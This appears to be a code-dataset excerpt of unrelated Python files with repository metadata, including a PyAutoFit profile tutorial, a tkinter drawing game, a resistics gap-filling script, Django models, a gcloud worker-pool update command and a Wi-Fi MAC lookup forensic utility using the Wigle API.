module from `gaussian.py` to `profiles.py` to reflect this. We have created an abstract base class `Profile` from
which all profiles inherit.
If you are not familiar with Python classes, in particular inheritance and the `super` method below, you may
be unsure what the classes are doing below. I have included comments describing what these command do.
The Profile class is a base class from which all profiles we add (e.g Gaussian, Exponential, additional profiles
added down the line) will inherit. This is useful, as it signifinies which aspects of our model are different ways of
representing the same thing.
"""
class Profile:
def __init__(self, centre=0.0, intensity=0.01):
"""
Represents an Abstract 1D profile.
Parameters
----------
centre : float
The x coordinate of the profile centre.
intensity : float
Overall intensity normalisation of the profile.
Every profile class we add below (e.g. Gaussian, Exponential) will call this __init__ method of the Profile
base class. Given that every profile will have a centre and intensity, this means we can set these parameters
in the Profile class`s init method instead of repeating the two lines of code for every individual profile.
"""
self.centre = centre
self.intensity = intensity
"""
The inclusion of (Profile) in the `Gaussian` below instructs Python that the `Gaussian` class is going to inherit from
the Profile class.
"""
class Gaussian(Profile):
def __init__(
self,
centre=0.0, # <- PyAutoFit recognises these constructor arguments
intensity=0.1, # <- are the Gaussian`s model parameters.
sigma=0.01,
):
"""Represents a 1D `Gaussian` profile, which may be treated as a model-component of PyAutoFit the
parameters of which are fitted for by a `NonLinearSearch`.
Parameters
----------
centre : float
The x coordinate of the profile centre.
intensity : float
Overall intensity normalisation of the `Gaussian` profile.
sigma : float
The sigma value controlling the size of the Gaussian.
Writing (Profile) above does not mean the `Gaussian` class will call the Profile class`s __init__ method. To
achieve this we have the call the `super` method following the format below.
"""
super(Gaussian, self).__init__(centre=centre, intensity=intensity)
"""
This super method calls the __init__ method of the Profile class above, which means we do not need
to write the two lines of code below (which are commented out given they are not necessary).
"""
# self.centre = centre
# self.intensity = intensity
self.sigma = sigma # We still need to set sigma for the Gaussian, of course.
def profile_from_xvalues(self, xvalues):
"""
Calculate the intensity of the profile on a line of Cartesian x coordinates.
The input xvalues are translated to a coordinate system centred on the Gaussian, using its centre.
Parameters
----------
values : np.ndarray
The x coordinates in the original reference frame of the grid.
"""
transformed_xvalues = np.subtract(xvalues, self.centre)
return np.multiply(
np.divide(self.intensity, self.sigma * np.sqrt(2.0 * np.pi)),
np.exp(-0.5 * np.square(np.divide(transformed_xvalues, self.sigma))),
)
class Exponential(Profile):
def __init__(
self,
centre=0.0, # <- PyAutoFit recognises these constructor arguments are the model
intensity=0.1, # <- parameters of the Gaussian.
rate=0.01,
):
"""Represents a 1D Exponential profile, which may be treated as a model-component of PyAutoFit the
parameters of which are fitted for by a `NonLinearSearch`.
Parameters
----------
centre : float
The x coordinate of the profile centre.
intensity : float
Overall intensity normalisation of the `Gaussian` profile.
ratw : float
The decay rate controlling has fast the Exponential declines.
"""
super(Exponential, self).__init__(centre=centre, intensity=intensity)
self.rate = rate
def profile_from_xvalues(self, xvalues):
"""
Calculate the intensity of the profile on a line of Cartesian x coordinates.
The input xvalues are translated to a coordinate system centred on the Exponential, using its centre.
Parameters
----------
values : np.ndarray
The x coordinates in the original reference frame of the grid.
"""
transformed_xvalues = np.subtract(xvalues, self.centre)
return self.intensity * np.multiply(
self.rate, np.exp(-1.0 * self.rate * abs(transformed_xvalues))
)
| [
"[email protected]"
] | |
6a2a59d480d7535ce9790d74f76a9ff441a76d8a | 8c5c74f6f0d19111f2873fcf7763ad1529110cb7 | /Examples/game4.py | a514e08d8424e79f30572b4f0255928ac58bc963 | [] | no_license | lostboy1/cps-108 | 44ba4e4aa6e224f73b8b82ab91c2216bdb821026 | 4264567557ba772f1b5e62ce380cf540af40d5d3 | refs/heads/master | 2023-01-19T13:19:10.469778 | 2020-12-01T07:39:29 | 2020-12-01T07:39:29 | 288,768,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,161 | py |
from tkinter import Tk, Canvas, mainloop
SPEED = 10
root = Tk()
c = Canvas(root, width=500, height=500)
c.pack()
# Put drawing here!
c.create_rectangle(0, 0, 500, 300, fill='blue')
c.create_rectangle(0, 300, 500, 500, fill='yellow')
c.create_rectangle(347, 380, 353, 450, fill='white')
c.create_polygon(350, 360, 400, 400, 300, 400, fill='green')
c.create_oval(80, 320, 140, 380, fill='white')
c.create_oval(85, 320, 135, 380, fill='blue')
c.create_oval(90, 320, 130, 380, fill='red')
c.create_oval(95, 320, 125, 380, fill='white')
c.create_oval(100, 320, 120, 380, fill='blue')
c.create_oval(105, 320, 115, 380, fill='red')
c.create_oval(109, 320, 111, 380, fill='white')
c.create_oval(440, 0, 550, 110, fill='yellow')
c.create_rectangle(0, 0, 505, 50, fill='light grey')
birds = [
c.create_polygon(300, 175, 335, 200, 300, 185, 265, 200, fill='white'),
c.create_polygon(165, 125, 200, 150, 165, 135, 130, 150, fill='white'),
]
def animate():
# Make bird wings flap.
if c.count % 5 == 0:
for bird in birds:
b = c.coords(bird)
yc = (b[1] + b[5]) / 2
for i in 3, 7:
yw = b[i]
if yw > yc:
b[i] = yc - 20
else:
b[i] = yc + 20
c.coords(bird, b)
# Move missiles.
for x, y, shape in missiles:
coords = c.coords(shape)
mx = coords[0]
my = coords[1]
dx = x - mx
if dx > SPEED:
dx = +SPEED
elif dx < -SPEED:
dx = -SPEED
dy = y - my
if dy > SPEED:
dy = +SPEED
elif dy < -SPEED:
dy = -SPEED
c.move(shape, dx, dy)
root.after(42, animate)
c.count = c.count + 1
c.count = 0
missiles = []
animate()
def launch_missile(event):
missile = c.create_polygon(
250,450, 245,455, 245,480, 240,485, 240,495, 245,490, 245,480, 245,490,
255,490, 255,480, 255,490, 260,495, 260,485, 255,480, 255,455,
fill='white', outline='black', width=3,
)
missiles.append([event.x, event.y, missile])
c.bind('<Button-1>', launch_missile)
mainloop()
| [
"[email protected]"
] | |
798b7d8a6302939a34469359265942e49b7adc81 | 9839b73a6c09ac8a110feb692ef0c001d93f8cbf | /examples/advanced/preprocessGapFill.py | fddd2531aa700c42c6ca76aff7b6d658df654398 | [
"MIT"
] | permissive | GeoMTMan/resistics | c253caa9a70295a462756625261f93349475908f | 942afe45456f63657267020749d723f7eee89934 | refs/heads/master | 2020-08-01T10:25:12.535890 | 2019-09-25T23:36:39 | 2019-09-25T23:36:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,255 | py | from pathlib import Path
from resistics.project.projectIO import loadProject
projectPath = Path("preprocessProject")
proj = loadProject(projectPath)
proj.printInfo()
from resistics.utilities.utilsPlotter import plotOptionsTime, getPresentationFonts
plotOptions = plotOptionsTime(plotfonts=getPresentationFonts())
from resistics.ioHandlers.dataReaderATS import DataReaderATS
site1 = proj.getSiteData("site1")
readerATS = DataReaderATS(site1.getMeasurementTimePath("meas_2012-02-10_11-05-00"))
# headers of recording
headers = readerATS.getHeaders()
chanHeaders, chanMap = readerATS.getChanHeaders()
# separate out two datasets
timeOriginal1 = readerATS.getPhysicalData(
"2012-02-10 11:05:00", "2012-02-10 11:09:00", remaverage=False
)
timeOriginal2 = readerATS.getPhysicalData(
"2012-02-10 11:10:00", "2012-02-10 11:14:00", remaverage=False
)
from resistics.ioHandlers.dataWriterInternal import DataWriterInternal
# create a new site
proj.createSite("site1_gaps")
proj.refresh()
writer = DataWriterInternal()
writer.setOutPath(
Path(proj.timePath, "site1_gaps", "meas_2012-02-10_11-05-00_section1")
)
writer.writeData(headers, chanHeaders, timeOriginal1, physical=True)
writer.setOutPath(
Path(proj.timePath, "site1_gaps", "meas_2012-02-10_11-05-00_section2")
)
writer.writeData(headers, chanHeaders, timeOriginal2, physical=True)
from resistics.project.projectTime import viewTime
# now view time
fig = viewTime(
proj,
"2012-02-10 11:05:00",
"2012-02-10 11:14:00",
sites=["site1", "site1_gaps"],
filter={"lpfilt": 16},
chans=["Ex", "Hy"],
show=False,
plotoptions=plotOptions,
)
fig.savefig(Path(proj.imagePath, "viewTimeGaps.png"))
from resistics.ioHandlers.dataReaderInternal import DataReaderInternal
siteGaps = proj.getSiteData("site1_gaps")
readerSection1 = DataReaderInternal(
siteGaps.getMeasurementTimePath("meas_2012-02-10_11-05-00_section1")
)
timeData1 = readerSection1.getPhysicalSamples(remaverage=False)
timeData1.printInfo()
readerSection2 = DataReaderInternal(
siteGaps.getMeasurementTimePath("meas_2012-02-10_11-05-00_section2")
)
timeData2 = readerSection2.getPhysicalSamples(remaverage=False)
timeData2.printInfo()
from resistics.utilities.utilsInterp import fillGap
timeDataFilled = fillGap(timeData1, timeData2)
timeDataFilled.printInfo()
samplesToView = 14 * 60 * 4096
fig = timeDataFilled.view(sampleStop=samplesToView, chans=["Ex", "Hy"])
fig.savefig(Path(proj.imagePath, "timeDataFilled.png"))
# create a new site to write out to
proj.createSite("site1_filled")
proj.refresh()
# use channel headers from one of the datasets, stop date will be automatically amended
writer = DataWriterInternal()
writer.setOutPath(
Path(proj.timePath, "site1_filled", "meas_2012-02-10_11-05-00_filled")
)
headers = readerSection1.getHeaders()
chanHeaders, chanMap = readerSection1.getChanHeaders()
writer.writeData(headers, chanHeaders, timeDataFilled, physical=True)
proj.refresh()
# now view time
fig = viewTime(
proj,
"2012-02-10 11:05:00",
"2012-02-10 11:14:00",
sites=["site1", "site1_filled"],
filter={"lpfilt": 16},
chans=["Ex", "Hy"],
show=False,
plotoptions=plotOptions,
)
fig.savefig(Path(proj.imagePath, "viewTimeGapsFilled.png")) | [
"[email protected]"
] | |
55a42b6ae85147bc6d3fec90d6653672efb28b4e | 3ae38471ca4ff70e30d8eeb0508b9b0aab5e19a2 | /web/models.py | c7e701ae4777b6eeb1dcdcbf6d7c130c9268d9b0 | [] | no_license | Hamidnet220/Chapar | 5596d6b703aa4c01c1010f0067cde5a57c33e336 | 3654601f34f0c58a17813851448889ccbf2c1c90 | refs/heads/master | 2020-05-03T04:22:51.140098 | 2019-04-02T05:15:50 | 2019-04-02T05:15:50 | 178,419,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,502 | py | from django.db import models
from django.core.exceptions import ValidationError
from django.contrib.auth.admin import User
# Create your models here.
def empty_validate_event(value):
if len(value)<=2:
raise ValidationError(("You can not leave this field empty!"),params={'value':value},)
class Organization(models.Model):
add_by_usr = models.ForeignKey(User,on_delete=models.CASCADE,related_name='add_by_usr_org')
title = models.CharField(max_length = 150,validators=[empty_validate_event])
tel = models.CharField(max_length = 19,blank=True)
fax = models.CharField(max_length = 19,blank=True)
is_deleted = models.BooleanField(default=False)
del_by_usr = models.ForeignKey(User,blank=True,null=True,on_delete=models.SET_NULL,related_name='del_by_usr_org')
def __str__(self):
return self.title
class Recive(models.Model):
add_by_usr = models.ForeignKey(User,on_delete=models.CASCADE,related_name='add_by_usr')
organization = models.ForeignKey(Organization,on_delete=models.SET_NULL,null=True)
title = models.CharField(max_length = 150,validators=[empty_validate_event])
summery = models.TextField(blank=True)
recive_date = models.DateTimeField()
recive_number= models.CharField(max_length = 150)
description = models.TextField(blank=True,null=True)
recive_file = models.FileField(upload_to='recives')
is_deleted = models.BooleanField(default=False)
del_by_usr = models.ForeignKey(User,blank=True,null=True,on_delete=models.SET_NULL,related_name='del_by_usr')
def __str__(self):
return "{}-{}".format(self.title,self.recive_date)
class Send(models.Model):
add_by_usr = models.ForeignKey(User,on_delete=models.CASCADE,related_name='add_by_usr_send')
organization = models.ForeignKey(Organization,on_delete=models.SET_NULL,null=True)
title = models.CharField(max_length = 150,validators=[empty_validate_event])
summery = models.TextField(blank=True)
send_date = models.DateTimeField()
send_number = models.CharField(max_length = 150)
description = models.TextField(blank=True,null=True)
send_file = models.FileField(upload_to='sends')
is_deleted = models.BooleanField(default=False)
del_by_usr = models.ForeignKey(User,blank=True,null=True,on_delete=models.SET_NULL,related_name='del_by_usr_send')
def __str__(self):
return "{}-{}".format(self.title,self.send_date)
| [
"[email protected]"
] | |
187fddd67774c914ce223c7045ba7f5c7c4549d1 | 86cc17a69213569af670faed7ad531cb599b960d | /playeer38.py | 429d4c4e3d64f9d3acb3095ca8e5794d9b54fa00 | [] | no_license | LakshmikanthRavi/guvi-lux | ed1c389e27a9ec62e0fd75c140322563f68d311a | 5c29f73903aa9adb6484c76103edf18ac165259e | refs/heads/master | 2020-04-15T05:07:19.743874 | 2019-08-13T08:53:00 | 2019-08-13T08:53:00 | 164,409,489 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | v=int(input())
li=[]
for i in range(1,v+1):
if v%i==0 and i%2==0:
li.append(i)
print(*li)
| [
"[email protected]"
] | |
9a18da4e47bb28850eb94b19cf46de0c7858bff1 | 008c065391d766fec2f2af252dd8a5e9bf5cb815 | /Compress the Lis.py | 177600548b994ba7e7b61511e9f4aed3f2340214 | [] | no_license | 22Rahul22/Codechef | b261ab43ff5ff64648a75ad1195e33cac2cfec52 | 1f645c779a250a71d75598e1eabad7e52dd6b031 | refs/heads/master | 2022-11-29T21:51:09.578798 | 2020-08-19T06:20:23 | 2020-08-19T06:20:23 | 288,650,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | t = int(input())
for _ in range(t):
n = int(input())
arr = list(map(int, input().split()))
c = 0
a = []
k = 0
s = ""
j = 0
arr.append(0)
for i in range(n):
if arr[i] + 1 == arr[i + 1]:
c += 1
else:
if c >= 2:
a.append(i - c)
a.append(i)
s += str(arr[a[j]]) + "..." + str(arr[a[j+1]])+","
j += 2
elif c == 1:
s += str(arr[i-1]) + "," + str(arr[i])+","
else:
s += str(arr[i])+","
c = 0
s = s[:len(s)-1]
print(s) | [
"[email protected]"
] | |
afec6ff7cb948c37315e39f43f5cc45300ea961e | bc9f66258575dd5c8f36f5ad3d9dfdcb3670897d | /lib/surface/builds/worker_pools/update.py | 903d79a17921d38c35943f2dfa7934dd354f2143 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | google-cloud-sdk-unofficial/google-cloud-sdk | 05fbb473d629195f25887fc5bfaa712f2cbc0a24 | 392abf004b16203030e6efd2f0af24db7c8d669e | refs/heads/master | 2023-08-31T05:40:41.317697 | 2023-08-23T18:23:16 | 2023-08-23T18:23:16 | 335,182,594 | 9 | 2 | NOASSERTION | 2022-10-29T20:49:13 | 2021-02-02T05:47:30 | Python | UTF-8 | Python | false | false | 12,000 | py | # -*- coding: utf-8 -*- #
# Copyright 2018 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Update worker pool command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.cloudbuild import cloudbuild_exceptions
from googlecloudsdk.api_lib.cloudbuild import cloudbuild_util
from googlecloudsdk.api_lib.cloudbuild import workerpool_config
from googlecloudsdk.api_lib.compute import utils as compute_utils
from googlecloudsdk.api_lib.util import waiter
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.cloudbuild import workerpool_flags
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core import resources
@base.ReleaseTracks(base.ReleaseTrack.GA)
class Update(base.UpdateCommand):
"""Update a worker pool used by Google Cloud Build."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To change the machine type and disk size of workers in a worker pool named wp1, run:
$ {command} wp1 --region=us-central1 \
--worker-machine-type=e2-standard-2 \
--worker-disk-size=64GB
""",
}
@staticmethod
def Args(parser):
"""Register flags for this command.
Args:
parser: An argparse.ArgumentParser-like object. It is mocked out in order
to capture some information, but behaves like an ArgumentParser.
"""
parser = workerpool_flags.AddWorkerpoolUpdateArgs(parser,
base.ReleaseTrack.GA)
parser.display_info.AddFormat("""
table(
name.segment(-1),
createTime.date('%Y-%m-%dT%H:%M:%S%Oz', undefined='-'),
state
)
""")
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Returns:
Some value that we want to have printed later.
"""
wp_name = args.WORKER_POOL
wp_region = args.region
release_track = self.ReleaseTrack()
client = cloudbuild_util.GetClientInstance(release_track)
messages = cloudbuild_util.GetMessagesModule(release_track)
parent = properties.VALUES.core.project.Get(required=True)
# Get the workerpool proto from either the flags or the specified file.
wp = messages.WorkerPool()
if args.config_from_file is not None:
try:
wp = workerpool_config.LoadWorkerpoolConfigFromPath(
args.config_from_file, messages)
# Don't allow a worker pool config for hybrid pools in any other
# track but alpha.
if release_track != base.ReleaseTrack.ALPHA:
if wp.hybridPoolConfig is not None:
raise cloudbuild_exceptions.HybridNonAlphaConfigError
except cloudbuild_exceptions.ParseProtoException as err:
log.err.Print('\nFailed to parse configuration from file.\n')
raise err
else:
wp.privatePoolV1Config = messages.PrivatePoolV1Config()
worker_config = messages.WorkerConfig()
if args.worker_machine_type is not None:
worker_config.machineType = args.worker_machine_type
if args.worker_disk_size is not None:
worker_config.diskSizeGb = compute_utils.BytesToGb(
args.worker_disk_size)
wp.privatePoolV1Config.workerConfig = worker_config
private_worker_network_config = messages.NetworkConfig()
# All of the egress flags are mutually exclusive with each other.
if args.no_public_egress or (release_track == base.ReleaseTrack.GA and
args.no_external_ip):
private_worker_network_config.egressOption = messages.NetworkConfig.EgressOptionValueValuesEnum.NO_PUBLIC_EGRESS
if args.public_egress:
private_worker_network_config.egressOption = messages.NetworkConfig.EgressOptionValueValuesEnum.PUBLIC_EGRESS
wp.privatePoolV1Config.networkConfig = private_worker_network_config
# Get the workerpool ref
wp_resource = resources.REGISTRY.Parse(
None,
collection='cloudbuild.projects.locations.workerPools',
api_version=cloudbuild_util.RELEASE_TRACK_TO_API_VERSION[release_track],
params={
'projectsId': parent,
'locationsId': wp_region,
'workerPoolsId': wp_name,
})
update_mask = cloudbuild_util.MessageToFieldPaths(wp)
req = messages.CloudbuildProjectsLocationsWorkerPoolsPatchRequest(
name=wp_resource.RelativeName(),
workerPool=wp,
updateMask=','.join(update_mask))
# Send the Update request
updated_op = client.projects_locations_workerPools.Patch(req)
op_resource = resources.REGISTRY.ParseRelativeName(
updated_op.name, collection='cloudbuild.projects.locations.operations')
updated_wp = waiter.WaitFor(
waiter.CloudOperationPoller(client.projects_locations_workerPools,
client.projects_locations_operations),
op_resource, 'Updating worker pool')
log.UpdatedResource(wp_resource)
return updated_wp
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class UpdateBeta(Update):
"""Update a worker pool used by Google Cloud Build."""
@staticmethod
def Args(parser):
"""Register flags for this command.
Args:
parser: An argparse.ArgumentParser-like object. It is mocked out in order
to capture some information, but behaves like an ArgumentParser.
"""
parser = workerpool_flags.AddWorkerpoolUpdateArgs(parser,
base.ReleaseTrack.BETA)
parser.display_info.AddFormat("""
table(
name,
createTime.date('%Y-%m-%dT%H:%M:%S%Oz', undefined='-'),
state
)
""")
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class UpdateAlpha(Update):
"""Update a private or hybrid pool used by Google Cloud Build."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
* Private pools
To change the machine type and disk size of a private pool named `pwp1`, run:
$ {command} pwp1 --region=us-central1 --worker-machine-type=e2-standard-2 --worker-disk-size=64GB
* Hybrid pools
To change the default build disk size and default build vcpu count of a hybrid pool named `hwp1`, run:
$ {command} hwp1 --region=us-west4 --default-build-disk-size=100GB --default-build-vcpu-count=3.5
""",
}
@staticmethod
def Args(parser):
"""Register flags for this command.
Args:
parser: An argparse.ArgumentParser-like object. It is mocked out in order
to capture some information, but behaves like an ArgumentParser.
"""
parser = workerpool_flags.AddWorkerpoolUpdateArgs(parser,
base.ReleaseTrack.ALPHA)
parser.display_info.AddFormat("""
table(
name.segment(-1),
createTime.date('%Y-%m-%dT%H:%M:%S%Oz', undefined='-'),
state
)
""")
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: an argparse namespace. All the arguments that were provided to this
command invocation.
Returns:
Some value that we want to have printed later.
"""
wp_name = args.WORKER_POOL
wp_region = args.region
release_track = self.ReleaseTrack()
client = cloudbuild_util.GetClientInstance(release_track)
messages = cloudbuild_util.GetMessagesModule(release_track)
parent = properties.VALUES.core.project.Get(required=True)
# Get the workerpool proto from either the flags or the specified file.
wp = messages.WorkerPool()
if args.config_from_file is not None:
try:
wp = workerpool_config.LoadWorkerpoolConfigFromPath(
args.config_from_file, messages)
except cloudbuild_exceptions.ParseProtoException as err:
log.err.Print('\nFailed to parse configuration from file. If you'
' were a Beta user, note that the format for this'
' file has changed slightly for GA.\n')
raise err
else:
private_worker_config = messages.WorkerConfig()
if args.worker_machine_type is not None:
private_worker_config.machineType = args.worker_machine_type
if args.worker_disk_size is not None:
private_worker_config.diskSizeGb = compute_utils.BytesToGb(
args.worker_disk_size)
private_worker_network_config = messages.NetworkConfig()
# All of the egress flags are mutually exclusive with each other.
if args.no_public_egress or (release_track == base.ReleaseTrack.GA and
args.no_external_ip):
private_worker_network_config.egressOption = messages.NetworkConfig.EgressOptionValueValuesEnum.NO_PUBLIC_EGRESS
if args.public_egress:
private_worker_network_config.egressOption = messages.NetworkConfig.EgressOptionValueValuesEnum.PUBLIC_EGRESS
# The private pool and hybrid pool flags are mutually exclusive
hybrid_worker_config = messages.HybridWorkerConfig()
if args.default_build_disk_size is not None:
hybrid_worker_config.diskSizeGb = compute_utils.BytesToGb(
args.default_build_disk_size)
if args.default_build_memory is not None:
hybrid_worker_config.memoryGb = compute_utils.BytesToGb(
args.default_build_memory)
if args.default_build_vcpu_count is not None:
hybrid_worker_config.vcpuCount = args.default_build_vcpu_count
if args.default_build_disk_size is not None or args.default_build_memory is not None or args.default_build_vcpu_count is not None:
wp.hybridPoolConfig = messages.HybridPoolConfig()
wp.hybridPoolConfig.defaultWorkerConfig = hybrid_worker_config
else:
wp.privatePoolV1Config = messages.PrivatePoolV1Config()
wp.privatePoolV1Config.networkConfig = private_worker_network_config
wp.privatePoolV1Config.workerConfig = private_worker_config
# Get the workerpool ref
wp_resource = resources.REGISTRY.Parse(
None,
collection='cloudbuild.projects.locations.workerPools',
api_version=cloudbuild_util.RELEASE_TRACK_TO_API_VERSION[release_track],
params={
'projectsId': parent,
'locationsId': wp_region,
'workerPoolsId': wp_name,
})
update_mask = cloudbuild_util.MessageToFieldPaths(wp)
req = messages.CloudbuildProjectsLocationsWorkerPoolsPatchRequest(
name=wp_resource.RelativeName(),
workerPool=wp,
updateMask=','.join(update_mask))
# Send the Update request
updated_op = client.projects_locations_workerPools.Patch(req)
op_resource = resources.REGISTRY.ParseRelativeName(
updated_op.name, collection='cloudbuild.projects.locations.operations')
updated_wp = waiter.WaitFor(
waiter.CloudOperationPoller(client.projects_locations_workerPools,
client.projects_locations_operations),
op_resource, 'Updating worker pool')
log.UpdatedResource(wp_resource)
return updated_wp
| [
"[email protected]"
] | |
2af7d3345e7878e5745045fa9d0cc15efba802d3 | 8e7e9aaf06fed4e5be52f61462a40539c55d0f76 | /Chapter03/wifi_lookup.py | 191b4060e6064134d820b48c18240f5a011382c0 | [] | no_license | CodedQuen/Python-Digital-Forensics-Cookbookk | 2809ed1680958250a139c22f8a33b5512b608d98 | f69e56d4f2f88e71a74dc538c7b3a934ee014369 | refs/heads/master | 2022-06-06T10:10:36.288517 | 2020-05-04T03:06:39 | 2020-05-04T03:06:39 | 261,067,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,612 | py | from __future__ import print_function
import argparse
import csv
import os
import sys
import xml.etree.ElementTree as ET
import requests
"""
MIT License
Copyright (c) 2017 Chapin Bryce, Preston Miller
Please share comments and questions at:
https://github.com/PythonForensics/PythonForensicsCookbook
or email [email protected]
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__authors__ = ["Chapin Bryce", "Preston Miller"]
__date__ = 20170815
__description__ = "Wifi MAC Address lookup utility"
def main(in_file, out_csv, type, api_key):
if type == 'xml':
wifi = parse_xml(in_file)
else:
wifi = parse_txt(in_file)
query_wigle(wifi, out_csv, api_key)
def parse_xml(xml_file):
wifi = {}
xmlns = "{http://pa.cellebrite.com/report/2.0}"
print("[+] Opening {} report".format(xml_file))
xml_tree = ET.parse(xml_file)
print("[+] Parsing report for all connected WiFi addresses")
root = xml_tree.getroot()
for child in root.iter():
if child.tag == xmlns + "model":
if child.get("type") == "Location":
for field in child.findall(xmlns + "field"):
if field.get("name") == "TimeStamp":
ts_value = field.find(xmlns + "value")
try:
ts = ts_value.text
except AttributeError:
continue
if field.get("name") == "Description":
value = field.find(xmlns + "value")
try:
value_text = value.text
except AttributeError:
continue
if "SSID" in value.text:
bssid, ssid = value.text.split("\t")
bssid = bssid[7:]
ssid = ssid[6:]
if bssid in wifi.keys():
wifi[bssid]["Timestamps"].append(ts)
wifi[bssid]["SSID"].append(ssid)
else:
wifi[bssid] = {
"Timestamps": [ts], "SSID": [ssid],
"Wigle": {}}
return wifi
def parse_txt(txt_file):
wifi = {}
print("[+] Extracting MAC addresses from {}".format(txt_file))
with open(txt_file) as mac_file:
for line in mac_file:
wifi[line.strip()] = {"Timestamps": ["N/A"], "SSID": ["N/A"],
"Wigle": {}}
return wifi
def query_mac_addr(mac_addr, api_key):
query_url = "https://api.wigle.net/api/v2/network/search?" \
"onlymine=false&freenet=false&paynet=false" \
"&netid={}".format(mac_addr)
req = requests.get(query_url, auth=(api_key[0], api_key[1]))
return req.json()
def query_wigle(wifi_dictionary, out_csv, api_key):
print("[+] Querying Wigle.net through Python API for {} "
"APs".format(len(wifi_dictionary)))
for mac in wifi_dictionary:
wigle_results = query_mac_addr(mac, api_key)
try:
if wigle_results["resultCount"] == 0:
wifi_dictionary[mac]["Wigle"]["results"] = []
continue
else:
wifi_dictionary[mac]["Wigle"] = wigle_results
except KeyError:
if wigle_results["error"] == "too many queries today":
print("[-] Wigle daily query limit exceeded")
wifi_dictionary[mac]["Wigle"]["results"] = []
continue
else:
print("[-] Other error encountered for "
"address {}: {}".format(mac, wigle_results['error']))
wifi_dictionary[mac]["Wigle"]["results"] = []
continue
prep_output(out_csv, wifi_dictionary)
def prep_output(output, data):
csv_data = {}
google_map = "https://www.google.com/maps/search/"
for x, mac in enumerate(data):
for y, ts in enumerate(data[mac]["Timestamps"]):
for z, result in enumerate(data[mac]["Wigle"]["results"]):
shortres = data[mac]["Wigle"]["results"][z]
g_map_url = "{}{},{}".format(
google_map, shortres["trilat"], shortres["trilong"])
csv_data["{}-{}-{}".format(x, y, z)] = {
**{
"BSSID": mac, "SSID": data[mac]["SSID"][y],
"Cellebrite Connection Time": ts,
"Google Map URL": g_map_url},
**shortres
}
write_csv(output, csv_data)
def write_csv(output, data):
print("[+] Writing data to {}".format(output))
field_list = set()
for row in data:
for field in data[row]:
field_list.add(field)
with open(output, "w", newline="") as csvfile:
csv_writer = csv.DictWriter(csvfile, fieldnames=sorted(
field_list), extrasaction='ignore')
csv_writer.writeheader()
for csv_row in data:
csv_writer.writerow(data[csv_row])
if __name__ == "__main__":
# Command-line Argument Parser
parser = argparse.ArgumentParser(
description=__description__,
epilog="Developed by {} on {}".format(
", ".join(__authors__), __date__),
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("INPUT_FILE", help="INPUT FILE with MAC Addresses")
parser.add_argument("OUTPUT_CSV", help="Output CSV File")
parser.add_argument(
"-t", help="Input type: Cellebrite XML report or TXT file",
choices=('xml', 'txt'), default="xml")
parser.add_argument('--api', help="Path to API key file",
default=os.path.expanduser("~/.wigle_api"),
type=argparse.FileType('r'))
args = parser.parse_args()
if not os.path.exists(args.INPUT_FILE) or \
not os.path.isfile(args.INPUT_FILE):
print("[-] {} does not exist or is not a file".format(
args.INPUT_FILE))
sys.exit(1)
directory = os.path.dirname(args.OUTPUT_CSV)
if directory != '' and not os.path.exists(directory):
os.makedirs(directory)
api_key = args.api.readline().strip().split(":")
main(args.INPUT_FILE, args.OUTPUT_CSV, args.t, api_key)
| [
"[email protected]"
] | |
0445ea582c61d35c6eefd8882991e0c018529aec | 1e987bd8b8be0dc1c139fa6bf92e8229eb51da27 | /deeplearning/ml4pl/models/lstm/lstm_base.py | fa9d858d66086a49b8e14f77d5252d3ef5008e2b | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | tszdanger/phd | c97091b4f1d7712a836f0c8e3c6f819d53bd0dd5 | aab7f16bd1f3546f81e349fc6e2325fb17beb851 | refs/heads/master | 2023-01-01T00:54:20.136122 | 2020-10-21T18:07:42 | 2020-10-21T18:09:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,806 | py | # Copyright 2019-2020 the ProGraML authors.
#
# Contact Chris Cummins <[email protected]>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
